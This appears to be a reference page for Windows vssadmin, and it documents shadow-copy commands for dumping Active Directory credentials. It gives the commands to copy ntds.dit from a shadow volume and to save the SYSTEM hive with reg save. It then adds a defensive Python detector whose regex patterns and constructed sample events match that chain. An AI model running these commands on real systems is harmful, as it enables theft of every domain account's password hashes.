vssadmin

⚠ Only present on Domain Controllers

Description

The Windows Volume Shadow Copy Service administration tool. It can be used to make copies of files that are currently in use and locked (including ntds.dit).

Platform: Windows
Author: Microsoft
License: Windows
URL: vssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files, such as ntds.dit, out of the shadow volume listed above.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you need to save the SYSTEM hive as well, since it holds the key needed to decrypt the contents of ntds.dit.

reg save hklm\system C:\windows\temp\system /y

vssadmin create shadow /for=c:

This will create a new shadow copy of the C: drive. Alternatively, you can create one from PowerShell with WMI:

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')
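From the defender's side, the chain shown on this page (shadow copy creation or listing, ntds.dit copied out of a HarddiskVolumeShadowCopy path, SYSTEM hive saved with reg.exe) is a useful process-creation detection, since backup jobs touch shadow copies but never stage ntds.dit. The Python below is an added example, not part of this page or of vssadmin; the event records are constructed to mimic process-creation logs and the field names (host, time, cmdline) are assumptions.

```python
import re
from datetime import datetime, timedelta

# Patterns for the three steps this page walks through, matched case-insensitively
# against a full process command line (e.g. Sysmon Event ID 1 or Security 4688).
SHADOW_ACCESS = re.compile(r"vssadmin(\.exe)?\s+(create|list)\s+shadow|win32_shadowcopy.*\.create", re.I)
NTDS_FROM_SHADOW = re.compile(r"harddiskvolumeshadowcopy\d+.*ntds\.dit", re.I)
SYSTEM_HIVE_SAVE = re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)

def classify(cmdline):
    """Return the step a command line corresponds to, or None if uninteresting."""
    if NTDS_FROM_SHADOW.search(cmdline):
        return "ntds_copy"
    if SYSTEM_HIVE_SAVE.search(cmdline):
        return "system_hive"
    if SHADOW_ACCESS.search(cmdline):
        return "shadow_access"
    return None

def detect(events, window=timedelta(minutes=30)):
    """Correlate per host: shadow access alone is 'low' (backups and admins do it);
    shadow access followed within `window` by an ntds.dit copy or SYSTEM hive save is 'high'."""
    by_host = {}
    for ev in events:
        step = classify(ev["cmdline"])
        if step:
            by_host.setdefault(ev["host"], []).append((ev["time"], step))
    findings = {}
    for host, steps in by_host.items():
        access_times = [t for t, s in steps if s == "shadow_access"]
        # Only staging steps that happen after (not before) a shadow access count.
        staged = {s for t, s in steps if s != "shadow_access"
                  and any(timedelta(0) <= t - a <= window for a in access_times)}
        if staged:
            findings[host] = "high"
        elif access_times:
            findings[host] = "low"
    return findings

# Constructed sample events (not real logs): a DC showing the full chain, a file
# server with routine shadow enumeration, and a workstation with nothing relevant.
T0 = datetime(2022, 3, 17, 17, 14, 25)
SAMPLE_EVENTS = [
    {"host": "DC01", "time": T0, "cmdline": r"vssadmin create shadow /for=c:"},
    {"host": "DC01", "time": T0 + timedelta(minutes=3), "cmdline":
     r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit"},
    {"host": "DC01", "time": T0 + timedelta(minutes=4), "cmdline": r"reg save hklm\system C:\windows\temp\system /y"},
    {"host": "FS02", "time": T0, "cmdline": r"vssadmin list shadows"},
    {"host": "WS03", "time": T0, "cmdline": r"notepad.exe C:\notes.txt"},
]
```

Running `detect(SAMPLE_EVENTS)` returns `{'DC01': 'high', 'FS02': 'low'}`; the PowerShell WMI variant above is caught by the same `SHADOW_ACCESS` pattern.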

Blog Posts